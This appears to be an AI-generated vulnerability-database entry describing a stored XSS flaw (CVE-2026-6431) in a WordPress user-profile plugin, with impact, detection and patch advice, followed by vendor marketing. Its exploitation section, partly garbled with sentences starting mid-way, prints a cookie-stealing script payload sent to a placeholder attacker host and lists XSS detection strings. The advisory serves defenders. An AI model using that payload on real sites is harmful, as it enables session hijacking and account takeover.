
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-6431 is a Stored Cross-Site Scripting (XSS) vulnerability in the User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress, developed by Cozmoslabs. The flaw exists in the 'Biographical Info' meta field and affects all plugin versions up to and including 3.15.7 due to insufficient input sanitization and output escaping. It was published on September 7, 2026, with a patch available as of the same date. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting). The plugin fails to properly sanitize user-supplied input in the 'Biographical Info' meta field and does not escape the stored value on output, allowing arbitrary JavaScript to be persisted in the database. Because no authentication is required to submit this field (e.g., during user registration), an unauthenticated remote attacker can inject a malicious script payload that executes in the browser of any user who subsequently views a page rendering the injected profile content. Relevant code paths are visible in front-end/class-formbuilder.php (line 743) and features/email-confirmation/class-email-confirmation.php (line 95) (GitHub Advisory, WordPress Trac).
Successful exploitation allows an unauthenticated attacker to persistently inject arbitrary JavaScript into WordPress pages, which executes in the browsers of any user who views the affected profile content. This can lead to session cookie theft, credential harvesting, unauthorized actions performed on behalf of authenticated users (including administrators), and website defacement. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the vulnerable component to the browsers of site visitors and administrators (GitHub Advisory, Wordfence).
No public proof-of-concept exploit code has been observed, and there is no evidence of in-the-wild exploitation at this time (GitHub Advisory). The vulnerability is rated as automatable (no user interaction required for injection), which lowers the barrier for mass exploitation. The EPSS score is approximately 0.241% (15th percentile), indicating a relatively low near-term exploitation probability. The CVE status is listed as "Deferred" and it does not appear in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).
https://target.com/wp-content/plugins/profile-builder/readme.txt) or using tools like WPScan.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>. No authentication is required.<script> tags or encoded JavaScript in the description or biographical_info parameter./wp-login.php?action=register or similar registration endpoints with abnormally large or encoded description field values; repeated access to profile pages from diverse IPs following a registration event.<script>, javascript:, onerror=, or other XSS payloads in the wp_usermeta table under the description meta key for user accounts.Update the User Profile Builder plugin to version 3.15.8 or later, which addresses the insufficient sanitization and output escaping in the 'Biographical Info' field (GitHub Advisory, WordPress Trac). As interim mitigations, implement a Content Security Policy (CSP) header to restrict inline script execution, and deploy Web Application Firewall (WAF) rules to detect and block script injection attempts in user profile fields. Site administrators should also audit existing user accounts for malicious content in the description meta field and remove any suspicious entries.
The vulnerability was assigned and disclosed by Wordfence, a leading WordPress security firm, which published the advisory on September 7, 2026 (Wordfence). RedPacketSecurity noted the vulnerability on Mastodon shortly after disclosure. No significant broader media coverage or notable researcher commentary beyond standard aggregation has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."